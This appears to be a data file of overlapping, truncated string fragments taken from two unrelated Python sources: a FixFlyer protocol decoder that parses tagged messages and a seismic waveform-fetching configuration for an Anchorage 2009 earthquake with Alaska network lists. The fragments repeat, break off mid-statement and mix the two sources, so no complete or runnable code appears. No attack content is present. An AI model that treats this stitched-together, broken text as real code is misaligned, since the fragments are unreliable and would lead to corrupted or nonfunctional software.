"= \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener =",
"event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type",
"getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg):",
"return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event",
"decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self,",
"= self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg,",
"buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos <",
"return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return",
"getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type ==",
"flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE:",
"msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event =",
"if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg)",
"decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg,",
"msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0:",
"return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf",
"return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type",
"log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return",
"event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self,",
"== flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type ==",
"None self._buf = \"\" return def set_listener(self, listener): self._listener = listener return def",
"msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return",
"== \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def",
"python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights",
"return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg)",
"+ MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type",
"return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return",
"\"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen):",
"self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\",",
"FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer",
"self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg)",
"return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return",
"= OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return",
"#FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE:",
"msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self,",
"import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def",
"get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos +",
"= self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf",
"= listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self):",
"msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME:",
"def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos",
"LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER",
"return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type <",
"#----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved.",
"== flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type ==",
"self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg)",
"== flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log",
"# COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. #",
"== flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log",
"decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result",
"decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg,",
"def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener",
"self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def",
"msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif",
"self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg)",
"if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif",
"event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME:",
"+ MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if",
"= OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event)",
"flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self):",
"result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def",
"OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return",
"buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos",
"event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif",
"msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\")",
"def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return",
"return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self, msg): return",
"\"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol",
"Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def",
"decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def",
"\"\\x01\") if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return",
"OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def",
"return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg):",
"self._buf = \"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self,",
"COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END",
"# All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER =",
"= getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg):",
"MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener",
"flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self,",
"\"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def",
"self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg):",
"event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if",
"0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return",
"if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif",
"self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0:",
"elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif",
"elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0:",
"\"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self,",
"return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg =",
"log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id"
] |
[] |
[
"getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if",
"list of Alaska networks # note 1: cannot use '*' because of IM",
"read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016",
"== 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist =",
"4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec",
"# [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' #",
"weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and",
"use '*' because of IM # note 2: may want to exclude the",
"59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list",
"ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon",
"are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP",
"in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0",
"= 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska",
"ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec",
"3: these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 #",
"<NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network",
"= 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP' #------------------------------ return(ev_info)",
"the mid-band AV network # note 3: these are temporary: # XE BEAAR",
"0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing",
"= 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default",
"= 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 #",
"may want to exclude the mid-band AV network # note 3: these are",
"ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec",
"ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep stations with",
"= False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon =",
"'*' because of IM # note 2: may want to exclude the mid-band",
"0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300",
"BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS",
"True #keep stations with missing components and fill the missing component with a",
"= 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat",
"when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False",
"# SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime",
"= obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec =",
"ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 # XV FLATS",
"= -147 # default list of Alaska networks # note 1: cannot use",
"exclude the mid-band AV network # note 3: these are temporary: # XE",
"33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\")",
"ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window",
"# note 2: may want to exclude the mid-band AV network # note",
"iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist",
"XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network",
"ev_info.ifverbose = True #keep stations with missing components and fill the missing component",
"the null component to 0 in the weight file when running cap #ev_info.icreateNull",
"can be used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash)",
"null component to 0 in the weight file when running cap #ev_info.icreateNull =",
"if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed =",
"= True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon =",
"XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV",
"ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 #",
"set the null component to 0 in the weight file when running cap",
"= True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat =",
"these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ",
"0 in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull =",
"= 1 ev_info.icreateNull = 0 #RAW and ENZ files can be used when",
"to 0 in the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull",
"component with a null trace (MPEN) #Be sure to set the null component",
"'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0",
"because of IM # note 2: may want to exclude the mid-band AV",
"the missing component with a null trace (MPEN) #Be sure to set the",
"2004 # XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014",
"for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat =",
"mid-band AV network # note 3: these are temporary: # XE BEAAR 1999",
"ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps",
"# note 3: these are temporary: # XE BEAAR 1999 # XR ARCTIC",
"# <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] # TA",
"when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files",
"are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw",
"checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed",
"components and fill the missing component with a null trace (MPEN) #Be sure",
"ev_info.icreateNull = 0 #RAW and ENZ files can be used when checking if",
"receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw =",
"False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False",
"2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 #",
"# XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 #",
"True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59",
"= 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime =",
"SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime =",
"sure to set the null component to 0 in the weight file when",
"= False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ =",
"# XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV'",
"get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog",
"(MPEN) #Be sure to set the null component to 0 in the weight",
"you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False",
"= 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose",
"1999 # XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006",
"# for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat",
"obspy import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # ===============================================================",
"ENZ files can be used when checking if you are receiving all the",
"cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can be",
"ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF =",
"from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage)",
"= False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ =",
"network # note 3: these are temporary: # XE BEAAR 1999 # XR",
"= True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat =",
"#output all proccessing steps ev_info.ifverbose = True #keep stations with missing components and",
"of IM # note 2: may want to exclude the mid-band AV network",
"ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for",
"to set the null component to 0 in the weight file when running",
"= 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon =",
"and ENZ files can be used when checking if you are receiving all",
"MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing",
"= 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all",
"with missing components and fill the missing component with a null trace (MPEN)",
"61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon",
"# ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag",
"100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep stations",
"data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed =",
"all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True",
"# XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005 #",
"= 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------",
"2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 #",
"= False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1",
"#-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat =",
"note 3: these are temporary: # XE BEAAR 1999 # XR ARCTIC 2004",
"=============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog = 0",
"testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420",
"the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed",
"ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50",
"null trace (MPEN) #Be sure to set the null component to 0 in",
"used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw =",
"# XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C",
"= obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window =",
"XZ STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME>",
"False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat",
"temporary: # XE BEAAR 1999 # XR ARCTIC 2004 # XZ STEEP 2005",
"True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147",
"ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420",
"ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime",
"ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ",
"True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62",
"* def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex ==",
"#ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can be used",
"= 300 #output all proccessing steps ev_info.ifverbose = True #keep stations with missing",
"False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True",
"#ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of",
"cannot use '*' because of IM # note 2: may want to exclude",
"IM # note 2: may want to exclude the mid-band AV network #",
"proccessing steps ev_info.ifverbose = True #keep stations with missing components and fill the",
"[7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for",
"#ev_info.max_lon = -147 # default list of Alaska networks # note 1: cannot",
"networks # note 1: cannot use '*' because of IM # note 2:",
"0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100",
"# note 1: cannot use '*' because of IM # note 2: may",
"XV FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP",
"= 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep =",
"trace (MPEN) #Be sure to set the null component to 0 in the",
"import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== #",
"= 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec =",
"ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep",
"obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300",
"2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015] #",
"-147 # default list of Alaska networks # note 1: cannot use '*'",
"XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 # XV",
"be used when checking if you are receiving all the data ($PYSEP/check_getwaveform.bash) ev_info.isave_raw",
"TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG'",
"the weight file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW",
"file when running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ",
"= 0 #RAW and ENZ files can be used when checking if you",
"'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?'",
"= -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428",
"Alaska networks # note 1: cannot use '*' because of IM # note",
"= 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6",
"= 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0",
"#ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP' #------------------------------",
"note 1: cannot use '*' because of IM # note 2: may want",
"-152 #ev_info.max_lon = -147 # default list of Alaska networks # note 1:",
"example event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\")",
"# default list of Alaska networks # note 1: cannot use '*' because",
"reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event",
"ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ",
"#ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat",
"running cap #ev_info.icreateNull = 1 ev_info.icreateNull = 0 #RAW and ENZ files can",
